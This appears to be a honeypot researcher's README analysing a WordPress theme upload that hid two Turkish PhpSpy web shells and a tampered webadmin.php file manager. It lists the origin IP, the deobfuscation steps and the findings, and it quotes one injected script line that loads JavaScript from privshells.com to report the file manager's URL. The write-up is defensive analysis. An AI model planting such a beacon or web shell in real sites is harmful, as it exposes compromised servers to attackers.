Skip to content

Latest commit

 

History

History

95.10.253.55-2018-01-25a

README.md

flat theme - Turkish PhpSpy and a kinked file manager

A WordPress theme containing two instances of a Turkish-language PhpSpy web shell, and a webadmin.php file manager that phones home with its URL.

Origin

IP address

95.10.253.55 → 95.10.253.55.dynamic.ttnet.com.tr

95.10.253.55.dynamic.ttnet.com.tr doesn't exist in DNS

whois data:

NIC Handle		: tyh14-metu
Organization Name	: Turkticaret.Net Yazýlým Hizmetleri Sanayi Ticaret A.Þ.
Address			: Uludag Universitesi Gorukle Kampusu
			  Ulutek Tek. Bol. Arge Binasi Yani Ek Bina Nilufer
			  Bursa,
			  Türkiye
Phone			: + 90-224-2248640
Fax			: + 90-224-2249520


inetnum:        95.10.236.0 - 95.10.255.255
netname:        TurkTelekom
descr:          TT ADSL-ttnet-ulus-dinamic
country:        tr
admin-c:        TTBA1-RIPE
tech-c:         TTBA1-RIPE
status:         ASSIGNED PA
mnt-by:         as9121-mnt

Download

The downloader used the theme upload feature of my WordPress honey pot. The downloader uploaded a file named flat.1.7.7 (2).zip, which seems to constitute a legit WordPress theme. Except it has 3 files with a different date in the Zip file: flat/404.php, flat/archive.php, flat/index.php.

Decoding

It turns out that index.php and 404.php have the same contents. Of the two, I chose to decode index.php

  1. cp index.php dc1.php
  2. Hand-edit dc1.php to print instead of eval
  3. php dc1.php > dc2.php

archive.php is FOPO encoded. Use a FOPO deobfuscator on it.

  1. php ~/src/php/FOPO-PHP-Deobfuscator/ver.-0.22/deobfuscator.php archive.php > bc2.php
  2. Pretty-print bc2.php, yielding fb2.php

Analysis

dc2.php appears to constitute the final form of that code. It's the slightly modified, Turkish-language PhpSpy of archive.php. That would match the ISP and location of the IP address.

fb2.php constitutes a hacked-up version of webadmin.php, a "simple web-based file browser". Not to worry, it's been kinked. Loading the HTML that fb2.php generates will cause your browser to load a JavaScript program:

echo "<SCRIPT SRC=http://privshells.com/blabla/per.js></SCRIPT>";

It looks like per.js will call http://privshells.com/blabla/per.php?url='+escape(location.href)+'. That is, it will tell a PHP program on privshells.com the URL of webadmin.php. Wow, these bottom-feeders just can't get enough of each other.

privshells.com → 185.85.75.98

185.85.75.98 → 185-85-75-99.datatr.com.tr

185.85.75.98 belongs to 185.85.75.0/24as43260, apparently a Turkish ISP.